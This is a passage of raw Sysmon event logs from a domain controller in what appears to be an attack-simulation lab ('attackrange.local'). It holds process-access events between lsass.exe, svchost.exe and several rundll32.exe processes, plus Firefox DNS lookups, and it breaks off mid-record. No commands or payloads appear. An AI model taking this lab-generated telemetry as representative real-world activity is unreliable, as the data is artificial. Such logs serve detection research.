10341000x800000000000000017170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.630{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.286{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.248{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:01.020{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.005{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.354{59A5CD1D-8E56-6005-2E00-00000000A301}246471.134.227.13.in-addr.arpa.0type: 12 server-13-227-134-71.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 10341000x800000000000000017182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program 
Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla 
Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.272{59A5CD1D-945A-6005-3305-00000000A301}7052joinhoney.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.257{59A5CD1D-945A-6005-3305-00000000A301}7052joinhoney.com0107.178.251.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.256{59A5CD1D-945A-6005-3305-00000000A301}7052www.joinhoney.com0type: 5 joinhoney.com;::ffff:107.178.251.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.185{59A5CD1D-945A-6005-3305-00000000A301}7052monday.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.175{59A5CD1D-945A-6005-3305-00000000A301}7052monday.com013.227.219.19;13.227.219.71;13.227.219.90;13.227.219.104;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.175{59A5CD1D-945A-6005-3305-00000000A301}7052www.nzz.ch9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.175{59A5CD1D-945A-6005-3305-00000000A301}7052monday.com0::ffff:13.227.219.104;::ffff:13.227.219.19;::ffff:13.227.219.71;::ffff:13.227.219.90;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:02.174{59A5CD1D-945A-6005-3305-00000000A301}7052d1860nkzpr7ksr.cloudfront.net02600:9000:21a1:bc00:10:e1a5:2c0:93a1;2600:9000:21a1:c200:10:e1a5:2c0:93a1;2600:9000:21a1:f000:10:e1a5:2c0:93a1;2600:9000:21a1:f800:10:e1a5:2c0:93a1;2600:9000:21a1:2e00:10:e1a5:2c0:93a1;2600:9000:21a1:4e00:10:e1a5:2c0:93a1;2600:9000:21a1:7400:10:e1a5:2c0:93a1;2600:9000:21a1:a600:10:e1a5:2c0:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.173{59A5CD1D-945A-6005-3305-00000000A301}7052www.nzz.ch0194.40.217.50;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.173{59A5CD1D-945A-6005-3305-00000000A301}7052www.nzz.ch0::ffff:194.40.217.50;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.173{59A5CD1D-945A-6005-3305-00000000A301}7052e8178.e6.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.172{59A5CD1D-945A-6005-3305-00000000A301}7052d1860nkzpr7ksr.cloudfront.net099.84.144.38;99.84.144.40;99.84.144.66;99.84.144.70;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.171{59A5CD1D-945A-6005-3305-00000000A301}7052www.n-tv.de0type: 5 d1860nkzpr7ksr.cloudfront.net;::ffff:99.84.144.70;::ffff:99.84.144.38;::ffff:99.84.144.40;::ffff:99.84.144.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.171{59A5CD1D-945A-6005-3305-00000000A301}7052e11619.dsce6.akamaiedge.net02a02:26f0:3100:196::2d63;2a02:26f0:3100:1b7::2d63;C:\Program 
Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.171{59A5CD1D-945A-6005-3305-00000000A301}7052e8178.e6.akamaiedge.net023.205.247.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.170{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesschau.de0type: 5 san.tagesschau.de.edgekey.net;type: 5 e8178.e6.akamaiedge.net;::ffff:23.205.247.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.168{59A5CD1D-945A-6005-3305-00000000A301}7052e11619.dsce6.akamaiedge.net023.205.240.33;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.168{59A5CD1D-945A-6005-3305-00000000A301}7052www.dw.com0type: 5 www.dw.com.edgekey.net;type: 5 e11619.dsce6.akamaiedge.net;::ffff:23.205.240.33;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.167{59A5CD1D-945A-6005-3305-00000000A301}7052djvbdz1obemzo.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.166{59A5CD1D-945A-6005-3305-00000000A301}7052djvbdz1obemzo.cloudfront.net013.224.194.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.165{59A5CD1D-945A-6005-3305-00000000A301}7052www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 djvbdz1obemzo.cloudfront.net;::ffff:13.224.194.201;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.165{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.165{59A5CD1D-945A-6005-3305-00000000A301}7052reddit.map.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.com052.54.152.216;54.162.142.192;54.209.230.187;23.20.137.146;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052reddit.map.fastly.net0151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.com0::ffff:23.20.137.146;::ffff:52.54.152.216;::ffff:54.162.142.192;::ffff:54.209.230.187;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052www.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.161{59A5CD1D-945A-6005-3305-00000000A301}7052dyna.wikimedia.org02620:0:862:ed1a::1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:02.159{59A5CD1D-945A-6005-3305-00000000A301}7052star-mini.c10r.facebook.com02a03:2880:f11c:8183:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.159{59A5CD1D-945A-6005-3305-00000000A301}7052dyna.wikimedia.org091.198.174.192;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.159{59A5CD1D-945A-6005-3305-00000000A301}7052www.wikipedia.org0type: 5 dyna.wikimedia.org;::ffff:91.198.174.192;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.158{59A5CD1D-945A-6005-3305-00000000A301}7052star-mini.c10r.facebook.com0157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.157{59A5CD1D-945A-6005-3305-00000000A301}7052www.facebook.com0type: 5 star-mini.c10r.facebook.com;::ffff:157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.156{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.154{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com02a00:1450:4001:80b::200e;2a00:1450:4001:817::200e;2a00:1450:4001:820::200e;2a00:1450:4001:821::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.154{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.g.akamaiedge.net0104.79.89.85;C:\Program Files\Mozilla 
